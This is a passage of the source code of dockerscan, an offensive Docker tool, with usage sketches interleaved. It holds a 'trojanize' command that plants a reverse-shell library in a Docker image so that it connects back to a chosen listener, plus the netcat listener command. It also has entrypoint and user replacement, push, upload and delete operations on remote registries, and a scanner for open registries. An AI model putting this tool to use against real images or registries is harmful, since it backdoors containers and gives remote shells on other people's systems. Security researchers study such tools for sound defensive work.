117 | with modify_docker_image_metadata(image_path,
118 | output_docker_image) as (last_layer_json,
119 | root_layer_json):
120 |
121 | new_json_data_last_layer = update_layer_user(last_layer_json,
122 | config.new_user)
123 | new_json_info_root_layer = update_layer_user(root_layer_json,
124 | config.new_user)
125 |
126 | raise DockerscanReturnContextManager(new_json_data_last_layer,
127 | new_json_info_root_layer)
128 |
129 |
130 | def run_image_modify_entry_point_dockerscan(
131 | config: DockerImageInfoModifyEntryPointModel):
132 |
133 | assert isinstance(config, DockerImageInfoModifyEntryPointModel)
134 |
135 | output_docker_image = config.output_image
136 | image_path = config.image_path
137 |
138 | if not output_docker_image:
139 | output_docker_image = os.path.basename(config.image_path)
140 |
141 | if not output_docker_image.endswith("tar"):
142 | output_docker_image += ".tar"
143 |
144 | new_entry_point = config.new_entry_point
145 |
146 | add_binary_path = config.binary_path
147 | if add_binary_path:
148 | #
149 | # Add the new file to the image
150 | #
151 | log.info(" > Adding new data to the image")
152 | add_binary_path = os.path.abspath(add_binary_path)
153 |
154 | add_new_file_to_image(add_binary_path,
155 | new_entry_point,
156 | image_path)
157 |
158 | with modify_docker_image_metadata(image_path,
159 | output_docker_image) as (last_layer_json,
160 | root_layer_json):
161 |
162 | new_json_data_last_layer = update_layer_entry_point(last_layer_json,
163 | new_entry_point)
164 | new_json_info_root_layer = update_layer_entry_point(root_layer_json,
165 | new_entry_point)
166 |
167 | raise DockerscanReturnContextManager(new_json_data_last_layer,
168 | new_json_info_root_layer)
169 |
170 |
171 | __all__ = ("run_image_modify_trojanize_dockerscan",
172 | "run_image_modify_user_dockerscan",
173 | "run_image_modify_entry_point_dockerscan")
174 |
--------------------------------------------------------------------------------
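A minimal sketch of calling the trojanize routine directly; the image path, listener address and output name are placeholders, and the model is assumed to accept its declared fields as keyword arguments (as the CLI layer does):

    from dockerscan.actions.image.modifiers.model import (
        DockerImageInfoModifyTrojanizeModel,
    )
    from dockerscan.actions.image.modifiers.api import (
        run_image_modify_trojanize_dockerscan,
    )

    config = DockerImageInfoModifyTrojanizeModel(
        image_path="nginx.tar",       # placeholder: saved image to modify
        remote_addr="192.168.1.10",   # placeholder: host receiving the shell
        remote_port="2222",
        output_image="nginx-trojanized",
    )
    run_image_modify_trojanize_dockerscan(config)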
/dockerscan/actions/image/modifiers/cli.py:
--------------------------------------------------------------------------------
1 | import click
2 |
3 | from dockerscan import check_console_input_config
4 |
5 | from .model import *
6 | from .console import *
7 |
8 |
9 | @click.group(help="Modify a docker image commands")
10 | @click.pass_context
11 | def modify(ctx, **kwargs):
12 | pass
13 |
14 |
15 | @modify.command(help="trojanize a Docker image")
16 | @click.pass_context
17 | @click.argument("image_path")
18 | @click.option("--listen",
19 | "-l",
20 | "remote_addr",
21 | required=True,
22 |               help="remote address the reverse shell will connect back to")
23 | @click.option("-p",
24 | "--port",
25 | "remote_port",
26 | default="2222",
27 |               help="remote port the reverse shell will connect back to")
28 | @click.option("--output", "-o", "output_image")
29 | @click.option("--custom-shell", "-S", "custom_shell")
30 | def trojanize(ctx, **kwargs):
31 | config = DockerImageInfoModifyTrojanizeModel(**ctx.obj, **kwargs)
32 |
33 | # Check if valid
34 | if check_console_input_config(config):
35 | launch_dockerscan_image_modify_trojanize_in_console(config)
36 |
37 |
38 | @modify.command(help="change docker image global user")
39 | @click.pass_context
40 | @click.argument("image_path")
41 | @click.argument("new_user")
42 | @click.option("--output", "-o", "output_image")
43 | def user(ctx, **kwargs):
44 | config = DockerImageInfoModifyUserModel(**ctx.obj, **kwargs)
45 |
46 | # Check if valid
47 | if check_console_input_config(config):
48 | launch_dockerscan_image_modify_user_in_console(config)
49 |
50 |
51 | @modify.command(help="change docker entry point")
52 | @click.pass_context
53 | @click.argument("image_path")
54 | @click.argument("new_entry_point")
55 | @click.option("--add",
56 | "-a",
57 | "binary_path",
58 |               help="binary path to use instead of the current entry-point")
59 | @click.option("--output", "-o", "output_image")
60 | def entrypoint(ctx, **kwargs):
61 | config = DockerImageInfoModifyEntryPointModel(**ctx.obj, **kwargs)
62 |
63 | # Check if valid
64 | if check_console_input_config(config):
65 | launch_dockerscan_image_modify_entrypoint_in_console(config)
66 |
67 | #
68 | # - Inject binary
69 | # - Inject LD_PRELOAD -> as env vars
70 | # - Add environment vars
71 | # - Replace binary
72 | #
73 |
74 | __all__ = ("modify", )
--------------------------------------------------------------------------------
/dockerscan/actions/image/modifiers/console.py:
--------------------------------------------------------------------------------
1 | import os
2 | import logging
3 |
4 | from dockerscan import get_log_level, run_in_console
5 |
6 | from .api import *
7 | from .model import *
8 |
9 | log = logging.getLogger('dockerscan')
10 |
11 |
12 | def launch_dockerscan_image_modify_trojanize_in_console(
13 | config: DockerImageInfoModifyTrojanizeModel):
14 | """Launch in console mode"""
15 |
16 | log.setLevel(get_log_level(config.verbosity))
17 |
18 | with run_in_console(config.debug):
19 |
20 |         log.console("Trojanizing docker image...")
21 | log.console("Selected image: '{}'".format(
22 | os.path.basename(config.image_path)))
23 |
24 | run_image_modify_trojanize_dockerscan(config)
25 |
26 | log.console("Image trojanized successfully")
27 | log.console("Trojanized image location:")
28 | log.console(" > {}".format(
29 | "{}.tar".format(os.path.abspath(config.output_image))
30 | if config.output_image else
31 | "{}.tar".format(
32 | os.path.abspath(os.path.basename(config.image_path)))
33 | ))
34 |         log.console("To receive the reverse shell, just run:")
35 | log.console(" > nc -v -k -l {} {}".format(
36 | config.remote_addr,
37 | config.remote_port
38 | ))
39 |
40 |
41 | def launch_dockerscan_image_modify_user_in_console(
42 | config: DockerImageInfoModifyUserModel):
43 | """Launch in console mode"""
44 |
45 | log.setLevel(get_log_level(config.verbosity))
46 |
47 | with run_in_console(config.debug):
48 |
49 |         log.console("Starting modification of docker image...")
50 | log.console("Selected image: '{}'".format(
51 | os.path.basename(config.image_path)))
52 | log.console("Updating to the new user: '{}'".format(
53 | os.path.basename(config.new_user)))
54 |
55 | run_image_modify_user_dockerscan(config)
56 |
57 |         log.console("User updated successfully")
58 |
59 |
60 | def launch_dockerscan_image_modify_entrypoint_in_console(
61 | config: DockerImageInfoModifyEntryPointModel):
62 | """Launch in console mode"""
63 |
64 | log.setLevel(get_log_level(config.verbosity))
65 |
66 | with run_in_console(config.debug):
67 |
68 |         log.console("Starting modification of docker image...")
69 | log.console("Selected image: '{}'".format(
70 | os.path.basename(config.image_path)))
71 | log.console("Updating to the new entry-point: '{}'".format(
72 | os.path.basename(config.new_entry_point)))
73 |
74 | run_image_modify_entry_point_dockerscan(config)
75 |
76 |         log.console("Entry-point updated successfully")
77 |
78 |
79 | __all__ = ("launch_dockerscan_image_modify_trojanize_in_console",
80 | "launch_dockerscan_image_modify_user_in_console",
81 | "run_image_modify_entry_point_dockerscan",
82 | "launch_dockerscan_image_modify_entrypoint_in_console")
83 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/modifiers/model.py:
--------------------------------------------------------------------------------
1 | from dockerscan import SharedConfig, String
2 |
3 |
4 | class DockerImageInfoModifyTrojanizeModel(SharedConfig):
5 | image_path = String()
6 | remote_addr = String()
7 | remote_port = String(default="2222")
8 | output_image = String(default="")
9 | custom_shell = String(default="")
10 |
11 |
12 | class DockerImageInfoModifyUserModel(SharedConfig):
13 | image_path = String()
14 | output_image = String(default="")
15 | new_user = String(default="")
16 |
17 |
18 | class DockerImageInfoModifyEntryPointModel(SharedConfig):
19 | image_path = String()
20 | new_entry_point = String()
21 | output_image = String(default="")
22 | binary_path = String(default="")
23 |
24 |
25 | __all__ = ("DockerImageInfoModifyTrojanizeModel",
26 | "DockerImageInfoModifyUserModel",
27 | "DockerImageInfoModifyEntryPointModel")
28 |
--------------------------------------------------------------------------------
/dockerscan/actions/image/modifiers/shells/reverse_shell.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/dockerscan/actions/image/modifiers/shells/reverse_shell.so
--------------------------------------------------------------------------------
/dockerscan/actions/registry/__init__.py:
--------------------------------------------------------------------------------
1 | from .api import *
2 | from .model import *
3 |
--------------------------------------------------------------------------------
/dockerscan/actions/registry/api.py:
--------------------------------------------------------------------------------
1 | import random
2 | import string
3 |
4 | from typing import Union
5 |
6 | from .model import *
7 | from ...core.exceptions import DockerscanTimeoutError
8 | from ..helpers import get_remote_registry_info, sanitize_url, \
9 | get_ssl_common_names
10 |
11 | from .libs import *
12 |
13 |
14 | def run_analyze_info_dockerscan(config: DockerAnalyzeInfoModel) -> \
15 | Union[DockerscanTimeoutError,
16 | RemoteRegistryDetails]:
17 |
18 | assert isinstance(config, DockerAnalyzeInfoModel)
19 |
20 | # Sanitize the URL
21 | target = sanitize_url(config.registry)
22 |
23 |     # Detect the remote version and whether it requires authentication
24 | version, is_auth = get_remote_registry_info(target)
25 |
26 | ssl_domains = get_ssl_common_names(target)
27 |
28 | # Build the results
29 | result = RemoteRegistryDetails(target,
30 | version,
31 | ssl_domains,
32 | is_auth)
33 |
34 | if result.version == 2:
35 | result.add_respositories(list_repositories_v2(target))
36 |
37 | return result
38 |
39 |
40 | def run_analyze_push_dockerscan(config: DockerAnalyzePushModel):
41 |
42 | assert isinstance(config, DockerAnalyzePushModel)
43 |
44 | # Sanitize the URL
45 | target = sanitize_url(config.registry)
46 |
47 | link = push_image_v2(target,
48 | config.image_name,
49 | config.local_image,
50 | config.tag)
51 |
52 | return link
53 |
54 |
55 | def run_analyze_upload_dockerscan(config: DockerAnalyzeUploadModel):
56 |
57 | assert isinstance(config, DockerAnalyzeUploadModel)
58 |
59 | # Sanitize the URL
60 | target = sanitize_url(config.registry)
61 |
62 | # Build remote file name
63 | remote_filename = config.remote_filename
64 | if not remote_filename:
65 | characters = string.ascii_lowercase + string.digits
66 |
67 | remote_filename = "".join(random.choice(characters)
68 | for x in range(random.randint(5, 20)))
69 |
70 | link, _ = upload_content_v2(target,
71 | remote_filename,
72 | config.local_file)
73 |
74 | return link
75 |
76 |
77 | def run_analyze_delete_dockerscan(config: DockerAnalyzePushModel):
78 |
79 | assert isinstance(config, DockerAnalyzePushModel)
80 |
81 | # Sanitize the URL
82 | target = sanitize_url(config.registry)
83 |
84 | delete_image_v2(target, config.image_name, config.tag)
85 |
86 |
87 | __all__ = ("run_analyze_info_dockerscan", "run_analyze_push_dockerscan",
88 | "run_analyze_delete_dockerscan", "run_analyze_upload_dockerscan")
89 |
--------------------------------------------------------------------------------
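A minimal sketch of querying a registry through this API; the registry URL is a placeholder and the shared options are assumed to default sensibly:

    from dockerscan.actions.registry.model import DockerAnalyzeInfoModel
    from dockerscan.actions.registry.api import run_analyze_info_dockerscan

    # "http://127.0.0.1:5000" is a placeholder for a reachable registry.
    config = DockerAnalyzeInfoModel(registry="http://127.0.0.1:5000")
    details = run_analyze_info_dockerscan(config)

    print(details.version)         # detected API version
    print(details.repositories)    # repositories listed by the v2 catalog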
/dockerscan/actions/registry/cli.py:
--------------------------------------------------------------------------------
1 | import click
2 |
3 |
4 | from .model import *
5 | from .console import *
6 | from ..helpers import check_console_input_config
7 |
8 |
9 | @click.group("registry", help="Docker registry actions")
10 | @click.pass_context
11 | def registry(ctx, **kwargs):
12 | pass
13 |
14 |
15 | @registry.command(help="get a summary from remote registry")
16 | @click.pass_context
17 | @click.argument("registry")
18 | def info(ctx, **kwargs):
19 | config = DockerAnalyzeInfoModel(**ctx.obj, **kwargs)
20 |
21 | # Check if valid
22 | if check_console_input_config(config):
23 | launch_dockerscan_analyze_info_in_console(config)
24 |
25 |
26 | @registry.command(help="Push a docker image to remote registry")
27 | @click.pass_context
28 | @click.argument("registry")
29 | @click.argument("local_image")
30 | @click.argument("image_name")
31 | @click.option("--tag", "-t", default="latest")
32 | def push(ctx, **kwargs):
33 | config = DockerAnalyzePushModel(**ctx.obj, **kwargs)
34 |
35 | # Check if valid
36 | if check_console_input_config(config):
37 | launch_dockerscan_analyze_push_in_console(config)
38 |
39 |
40 | @registry.command(help="upload a file to remote registry")
41 | @click.pass_context
42 | @click.argument("registry")
43 | @click.argument("local_file")
44 | @click.option("--remote-filename", "-r", "remote_filename")
45 | def upload(ctx, **kwargs):
46 | config = DockerAnalyzeUploadModel(**ctx.obj, **kwargs)
47 |
48 | # Check if valid
49 | if check_console_input_config(config):
50 | launch_dockerscan_analyze_upload_in_console(config)
51 |
52 |
53 | @registry.command(help="delete a image form remote registry")
54 | @click.pass_context
55 | @click.argument("registry")
56 | @click.argument("image_name")
57 | @click.option("--tag", "-t", default="latest")
58 | def delete(ctx, **kwargs):
59 | config = DockerAnalyzePushModel(**ctx.obj, **kwargs)
60 |
61 | # Check if valid
62 | if check_console_input_config(config):
63 | launch_dockerscan_analyze_delete_in_console(config)
64 |
--------------------------------------------------------------------------------
/dockerscan/actions/registry/console.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | from dockerscan import get_log_level, DockerscanTimeoutError, run_in_console, \
4 | DockerscanError
5 |
6 | from .api import *
7 | from .model import *
8 | from ..helpers import sanitize_url, display_results_console
9 |
10 | log = logging.getLogger('dockerscan')
11 |
12 |
13 | def launch_dockerscan_analyze_info_in_console(config: DockerAnalyzeInfoModel):
14 |
15 | log.setLevel(get_log_level(config.verbosity))
16 |
17 | with run_in_console(config.debug):
18 |
19 | try:
20 |             log.console("Starting analysis of docker Registry...")
21 | log.console("Selected registry: '{}'".format(
22 | sanitize_url(config.registry)))
23 |
24 | results = run_analyze_info_dockerscan(config)
25 |
26 | # Show results
27 | log.console("Analysis finished. Results:")
28 | display_results_console(results, log)
29 | except DockerscanTimeoutError as e:
30 | log.console(e)
31 |
32 |
33 | def launch_dockerscan_analyze_push_in_console(config: DockerAnalyzePushModel):
34 |
35 | log.setLevel(get_log_level(config.verbosity))
36 |
37 | with run_in_console(config.debug):
38 |
39 | try:
40 | log.console("Starting pushing process to Registry...")
41 | log.console("Selected registry: '{}'".format(
42 | sanitize_url(config.registry)))
43 |
44 | link = run_analyze_push_dockerscan(config)
45 |
46 | # Show results
47 | log.console("Image uploaded")
48 | log.console(" > {}".format(link))
49 |
50 | except DockerscanTimeoutError as e:
51 | log.console(e)
52 |
53 |
54 | def launch_dockerscan_analyze_upload_in_console(config: DockerAnalyzeUploadModel):
55 |
56 | log.setLevel(get_log_level(config.verbosity))
57 |
58 | with run_in_console(config.debug):
59 |
60 | try:
61 | log.console("Uploading file to Registry...")
62 | log.console("Selected registry: '{}'".format(
63 | sanitize_url(config.registry)))
64 |
65 | link = run_analyze_upload_dockerscan(config)
66 |
67 | # Show results
68 | log.console("File location:")
69 | log.console(" > {}".format(link))
70 |
71 | except DockerscanTimeoutError as e:
72 | log.console(e)
73 |
74 |
75 | def launch_dockerscan_analyze_delete_in_console(config: DockerAnalyzePushModel):
76 |
77 | log.setLevel(get_log_level(config.verbosity))
78 |
79 | with run_in_console(config.debug):
80 |
81 | try:
82 |             log.console("Starting delete process on Registry...")
83 | log.console("Selected registry: '{}'".format(
84 | sanitize_url(config.registry)))
85 |
86 | run_analyze_delete_dockerscan(config)
87 |
88 |             # Show results
89 |             log.console("Images deleted")
92 | except DockerscanError as e:
93 | log.console(e)
94 | except DockerscanTimeoutError as e:
95 | log.console(e)
96 |
97 |
98 | __all__ = ("launch_dockerscan_analyze_info_in_console",
99 | "launch_dockerscan_analyze_push_in_console",
100 | "launch_dockerscan_analyze_delete_in_console",
101 | "launch_dockerscan_analyze_upload_in_console")
102 |
--------------------------------------------------------------------------------
/dockerscan/actions/registry/libs/__init__.py:
--------------------------------------------------------------------------------
1 | from .helpers import *
2 | from .registry_v2 import *
3 |
--------------------------------------------------------------------------------
/dockerscan/actions/registry/libs/helpers.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cr0hn/dockerscan/590a844418038d25e6649e609ef630868e0c9161/dockerscan/actions/registry/libs/helpers.py
--------------------------------------------------------------------------------
/dockerscan/actions/registry/libs/registry_v2.py:
--------------------------------------------------------------------------------
1 | import os
2 | from typing import Set, Tuple, Union
3 |
4 | import requests
5 |
6 | from dxf import DXF
7 | from dockerscan import DockerscanNotExitsError, DockerscanError
8 |
9 |
10 | def _get_digest_by_tag(registry: str,
11 | remote_image_name: str,
12 | tag: str) -> str:
13 | insecure, registry_without_schema = _get_schema_and_security(registry)
14 |
15 | d = DXF(registry_without_schema,
16 | remote_image_name,
17 | insecure=insecure)
18 |
19 | try:
20 | return d.get_alias(alias=tag)[0]
21 | except (IndexError, requests.exceptions.HTTPError):
22 | return ""
23 |
24 |
25 | def _get_schema_and_security(registry:str) -> tuple:
26 | insecure = True
27 | if registry.startswith("https://"):
28 | insecure = False
29 |
30 | if registry.startswith("http"):
31 | k = "://"
32 | registry_without_schema = registry[registry.find(k) + len(k):]
33 | else:
34 | registry_without_schema = registry
35 |
36 | return insecure, registry_without_schema
37 |
38 |
39 | def list_repositories_v2(registry: str):
40 |
41 | # List repositories
42 | r = requests.get("{}/v2/_catalog".format(registry),
43 | timeout=2,
44 | allow_redirects=False,
45 | verify=False)
46 | return r.json().get("repositories", [])
47 |
48 |
49 | def upload_content_v2(registry: str,
50 | remote_image_name: str,
51 | local_image: str) -> Tuple[str, str]:
52 | """
53 | Push a content to Docker Registry and return the URL to access
54 |
55 | :return: a tuple (image_link: str, image_digest: str)
56 | """
57 |
58 |     # Strip backslashes: on the command line "nginx:latest" often has to be
59 |     # written escaped as "nginx\:latest"
60 | _image = os.path.abspath(local_image.replace("\\", ""))
61 |
62 | if not os.path.exists(_image):
63 |         raise DockerscanNotExitsError("Selected local image does not exist")
64 |
65 | insecure, registry_without_schema = _get_schema_and_security(registry)
66 |
67 | d = DXF(registry_without_schema,
68 | remote_image_name,
69 | insecure=insecure)
70 | image_digest = d.push_blob(_image)
71 |
72 | # Image link
73 | img_link = "{schema}://{host}/v2/{repo}/blobs/sha256:{digest}".format(
74 | schema="http" if insecure else "https",
75 | host=registry_without_schema,
76 | repo=remote_image_name,
77 | digest=image_digest
78 | )
79 |
80 | return img_link, image_digest
81 |
82 |
83 | def push_image_v2(registry: str,
84 | remote_image_name: str,
85 | local_image: str,
86 | tag: str) -> str:
87 | """Push a content to Docker Registry and return the URL to access"""
88 |
89 | insecure, registry_without_schema = _get_schema_and_security(registry)
90 |
91 | download_link, digest = upload_content_v2(registry, remote_image_name, local_image)
92 |
93 | d = DXF(registry_without_schema,
94 | remote_image_name,
95 | insecure=insecure)
96 | d.set_alias(tag, digest)
97 |
98 | return download_link
99 |
100 |
101 | def delete_image_v2(registry: str,
102 | remote_image_name: str,
103 | tag: str = "latest") -> Union[Set[str],
104 | DockerscanError]:
105 | """
106 |     Delete the selected images from the remote repo.
107 | 
108 |     remote_image_name can contain regex expressions.
109 | 
110 |     :return: a set() with the deleted images
111 | """
112 | insecure, registry_without_schema = _get_schema_and_security(registry)
113 |
114 | d = DXF(registry_without_schema,
115 | remote_image_name,
116 | insecure=insecure)
117 |
118 | removed = set()
119 |
120 | # Getting remote digest for the tag
121 | digest = _get_digest_by_tag(registry, remote_image_name, tag)
122 |
123 | if not digest:
124 | raise DockerscanError("> Can't obtain digest reference for selected "
125 | "image / tag")
126 |
127 |     try:
128 |         # A digest was found, so the remote reference points to a single
129 |         # image -> remove it directly
130 | 
131 |         d.del_alias(digest)
132 | 
133 |         removed.add(remote_image_name)
134 | 
135 |         return removed
136 |
137 | except requests.exceptions.HTTPError:
138 | raise DockerscanError("> Registry does not support delete "
139 | "operations. Default Docker Registry does not "
140 | "support deletion. For more information see: "
141 | "https://docs.docker.com/registry/"
142 | "configuration/")
143 |
144 | __all__ = ("list_repositories_v2", "upload_content_v2", "push_image_v2",
145 | "delete_image_v2")
146 |
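A minimal usage sketch for the helpers above (not part of the package). The registry URL "http://localhost:5000" and the file "./layer.tar" are placeholders, and the registry must allow deletions or delete_image_v2() will raise DockerscanError, as implemented above.

    from dockerscan.actions.registry.libs.registry_v2 import (
        list_repositories_v2,
        push_image_v2,
        delete_image_v2,
    )

    registry = "http://localhost:5000"   # hypothetical test registry

    # Enumerate the repositories exposed by /v2/_catalog
    print(list_repositories_v2(registry))

    # Push a local blob, tag it, then remove the tag again
    link = push_image_v2(registry, "busybox", "./layer.tar", tag="latest")
    print("Pushed:", link)
    print("Deleted:", delete_image_v2(registry, "busybox", tag="latest"))
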
--------------------------------------------------------------------------------
/dockerscan/actions/registry/model.py:
--------------------------------------------------------------------------------
1 | from dockerscan import SharedConfig, String
2 |
3 |
4 | class DockerAnalyzeInfoModel(SharedConfig):
5 | registry = String()
6 |
7 |
8 | class DockerAnalyzeUploadModel(SharedConfig):
9 | registry = String()
10 | local_file = String()
11 | remote_filename = String(default="")
12 |
13 |
14 | class DockerAnalyzePushModel(SharedConfig):
15 | registry = String()
16 | local_image = String()
17 | image_name = String()
18 | tag = String(default="latest")
19 |
20 |
21 | class DockerAnalyzeDeleteModel(SharedConfig):
22 | registry = String()
23 | image = String()
24 |
25 |
26 | class RemoteRegistryDetails:
27 |
28 | def __init__(self,
29 | address: str,
30 | version: int,
31 | domains: set,
32 | has_authentication: bool):
33 | self.address = address
34 | self.version = version
35 | self.domains = domains
36 | self.has_authentication = has_authentication or False
37 | self.repositories = set()
38 |
39 | def add_respositories(self, repos: list):
40 | self.repositories.update(repos)
41 |
42 |     def __repr__(self):
43 |         return "<Registry {} - Version: {} - Authentication: {}>".format(
44 |             self.address,
45 |             self.version,
46 |             "Open" if not self.has_authentication else "Enabled"
47 |         )
48 |
49 | __all__ = ("DockerAnalyzeInfoModel", "RemoteRegistryDetails",
50 | "DockerAnalyzeUploadModel", "DockerAnalyzeDeleteModel",
51 | "DockerAnalyzePushModel")
52 |
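A short instantiation sketch for the models above. All values are placeholders; the extra fields (verbosity, debug, timeout) come from SharedConfig in dockerscan/core/model.py.

    from dockerscan.actions.registry.model import (
        DockerAnalyzePushModel,
        RemoteRegistryDetails,
    )

    push_config = DockerAnalyzePushModel(
        registry="http://localhost:5000",   # placeholder registry
        local_image="./nginx.tar",          # placeholder local tar
        image_name="nginx",
        tag="latest",
    )

    details = RemoteRegistryDetails(address="http://localhost:5000",
                                    version=2,
                                    domains=set(),
                                    has_authentication=False)
    details.add_respositories(["nginx", "busybox"])  # method name as defined above
    print(details)
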
--------------------------------------------------------------------------------
/dockerscan/actions/scan/__init__.py:
--------------------------------------------------------------------------------
1 | from .api import *
2 | from .model import *
3 | from .console import *
4 |
--------------------------------------------------------------------------------
/dockerscan/actions/scan/api.py:
--------------------------------------------------------------------------------
1 | import ssl
2 | import socket
3 | import asyncio
4 | import logging
5 | import ipaddress
6 |
7 | from typing import Set, List, Dict
8 |
9 | from .model import *
10 |
11 | log = logging.getLogger("dockerscan")
12 |
13 |
14 | # --------------------------------------------------------------------------
15 | # Helpers
16 | # --------------------------------------------------------------------------
17 | def _expand_ips(raw_target: str) -> Set[str]:
18 |     def _expand_ip(ip: str) -> list:
19 |         if "/" in ip:
20 |             try:
21 |                 return [str(x) for x in ipaddress.ip_network(
22 |                     ip,
23 |                     strict=False).hosts()]
24 |             except ValueError:
25 |                 # If this error is raised -> the target is a domain name
26 |                 _domain, _subnet, *_ = ip.split("/", maxsplit=2)
27 |                 new_target = "{}/{}".format(socket.gethostbyname(_domain),
28 |                                             _subnet)
29 | 
30 |                 return [str(x) for x in ipaddress.ip_network(
31 |                     new_target,
32 |                     strict=False).hosts()]
33 |         else:
34 |             try:
35 |                 return [str(ipaddress.ip_address(ip))]
36 |             except ValueError:
37 |                 new_target = socket.gethostbyname(ip)
38 | 
39 |                 # A single resolved host -> return it directly instead of
40 |                 # building a /32 network around it
41 |                 return [new_target]
42 |
43 | if "-" in raw_target:
44 | targets = raw_target.split("-")
45 | else:
46 | targets = [raw_target]
47 |
48 | ip_address_expanded = set()
49 |
50 | # Expand IPs
51 | for target in targets:
52 | # Extract IP address
53 | ip_address_expanded.update(_expand_ip(target))
54 |
55 | return ip_address_expanded
56 |
57 |
58 | def _expand_ports(raw_ports: str) -> Set[int]:
59 | 
60 |     total_ports = set()
61 | 
62 |     for port_element in raw_ports.split(","):
63 | 
64 |         if "-" in port_element:
65 |             _p = port_element.split("-", maxsplit=1)
66 | 
67 |             if len(_p) == 2 and all(x for x in _p):
68 |                 # Sort the bounds so reversed ranges also work
69 |                 port_start, port_end = sorted(int(x) for x in _p)
70 | 
71 |                 # +1: range() excludes the upper bound
72 |                 ports_ranges = range(port_start, port_end + 1)
73 | 
74 |             else:
75 | 
76 |                 # If one of the bounds is missing, only take the first
77 |                 # port of the range
78 |                 ports_ranges = [int(_p[0])]
79 | 
80 |         else:
81 |             ports_ranges = [int(port_element)]
82 | 
83 |         total_ports.update(ports_ranges)
84 | 
85 |     return total_ports
86 |
87 | # --------------------------------------------------------------------------
88 | # Scanner
89 | # --------------------------------------------------------------------------
90 | async def _get_connection(target,
91 |                           port,
92 |                           ssl_context,
93 |                           timeout,
94 |                           loop):
95 |     con = asyncio.open_connection(host=target,
96 |                                   port=port,
97 |                                   ssl=ssl_context)
98 |
99 | try:
100 | reader, writer = await asyncio.wait_for(con,
101 | int(timeout),
102 | loop=loop)
103 |
104 | return reader, writer
105 | except (asyncio.TimeoutError, ConnectionRefusedError):
106 |         # If this is reached -> the port is closed
107 | return None, None
108 |
109 | async def _check_ports(target: str,
110 | port: int,
111 | loop: asyncio.AbstractEventLoop,
112 | sem: asyncio.BoundedSemaphore,
113 | results: list,
114 | config: DockerScanModel):
115 |
116 | open_ports = set()
117 |
118 | # for port in ports:
119 |
120 | log.error(" > Trying {}:{}".format(target, port))
121 |
122 | is_ssl = True
123 |
124 | try:
125 |         # Is the connection over SSL?
126 |         try:
127 |             # This SSL context definition allows connecting to servers
128 |             # that use self-signed certificates
129 | sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
130 | sslcontext.options |= ssl.OP_NO_SSLv2
131 | sslcontext.options |= ssl.OP_NO_SSLv3
132 | sslcontext.options |= getattr(ssl, "OP_NO_COMPRESSION", 0)
133 | sslcontext.set_default_verify_paths()
134 |
135 | reader, writer = await _get_connection(target,
136 | port,
137 | sslcontext,
138 | config.timeout,
139 | loop)
140 |
141 | if not reader:
142 | return
143 |
144 | except ssl.SSLError:
145 | reader, writer = await _get_connection(target,
146 | port,
147 | None,
148 | config.timeout,
149 | loop)
150 |
151 | if not reader:
152 | return
153 |
154 | is_ssl = False
155 |
156 | # Send HTTP Header
157 | writer.write(
158 | "GET /v2/ HTTP/1.1\r\nHost: {}\r\n\r\n".format(target).encode()
159 | )
160 |
161 | # Get Server response
162 |         read_coro = reader.read(1000)
163 |         try:
164 |             data = await asyncio.wait_for(read_coro,
165 |                                           1,
166 |                                           loop=loop)
167 | except (asyncio.TimeoutError, ConnectionRefusedError):
168 |             # If this point is reached -> the server didn't send a response
169 | return
170 |
171 | if b"registry/2.0" in data or \
172 | b"Docker-Distribution-Api-Version" in data:
173 |
174 | content = data.lower()
175 |
176 | if b"200 ok" in content:
177 | status = "open"
178 | elif b"401" in content:
179 | status = "auth required"
180 | else:
181 | status = "reachable"
182 |
183 | log.info(" + Discovered port {}:{}".format(
184 | target,
185 | port
186 | ))
187 |
188 | open_ports.add((port, status, is_ssl))
189 |
190 | # close descriptor
191 | writer.close()
192 |
193 | if open_ports:
194 | results.append(
195 | {
196 | target: open_ports
197 | }
198 | )
199 |
200 | finally:
201 | sem.release()
202 |
203 |
204 | async def _scan(targets: Set[str],
205 | ports: Set[int],
206 | config: DockerScanModel,
207 | loop: asyncio.AbstractEventLoop):
208 |
209 | max_concurrency = asyncio.BoundedSemaphore(int(config.concurrency),
210 | loop=loop)
211 |
212 | results = []
213 | tasks = []
214 |
215 | for target in targets:
216 | for port in ports:
217 | await max_concurrency.acquire()
218 |
219 | tasks.append(loop.create_task(_check_ports(
220 | target,
221 | port,
222 | loop,
223 | max_concurrency,
224 | results,
225 | config
226 | )))
227 |
228 | await asyncio.wait(tasks, loop=loop)
229 |
230 | return results
231 |
232 |
233 | def run_scan_dockerscan(config: DockerScanModel) -> List[Dict[str, set]]:
234 | assert isinstance(config, DockerScanModel)
235 |
236 | # Expand IPs
237 | total_ips = _expand_ips(config.target)
238 | log.critical(" - Total host to analyze: {}".format(len(total_ips)))
239 |
240 | # Expand Ports
241 | total_ports = _expand_ports(config.ports)
242 | log.critical(" - Total port per host to check: {}".format(len(total_ports)))
243 |
244 | loop = asyncio.get_event_loop()
245 |
246 | try:
247 | results = loop.run_until_complete(_scan(total_ips,
248 | total_ports,
249 | config,
250 | loop))
251 |
252 | finally:
253 | for t in asyncio.Task.all_tasks(loop=loop):
254 | t.cancel()
255 |
256 |             # Ensure all the tasks end
257 | async def close_delay_loop():
258 | loop.stop()
259 |
260 | loop.run_until_complete(asyncio.ensure_future(close_delay_loop()))
261 |
262 | return results
263 |
264 |
265 | __all__ = ("run_scan_dockerscan",)
266 |
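A sketch of driving the scanner directly from Python instead of through the CLI. The target and ports below are placeholders, and the call opens real network connections.

    from dockerscan.actions.scan.api import run_scan_dockerscan
    from dockerscan.actions.scan.model import DockerScanModel

    config = DockerScanModel(target="127.0.0.1",      # placeholder target
                             ports="5000,8000-8080",  # placeholder ports
                             concurrency="10",
                             timeout="2")

    # Each result maps a host to a set of (port, status, is_ssl) tuples
    for result in run_scan_dockerscan(config):
        for host, open_ports in result.items():
            for port, status, is_ssl in open_ports:
                print(host, port, status, "ssl" if is_ssl else "plain")
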
--------------------------------------------------------------------------------
/dockerscan/actions/scan/cli.py:
--------------------------------------------------------------------------------
1 | import click
2 |
3 | from .model import *
4 | from .console import *
5 | from ..helpers import check_console_input_config
6 |
7 |
8 | @click.command(help="Search for Open Docker Registries")
9 | @click.pass_context
10 | @click.argument("target")
11 | @click.option("--timeout", "-t", "timeout", help="timeout for each port-check")
12 | @click.option("--ports", "-p", "ports",
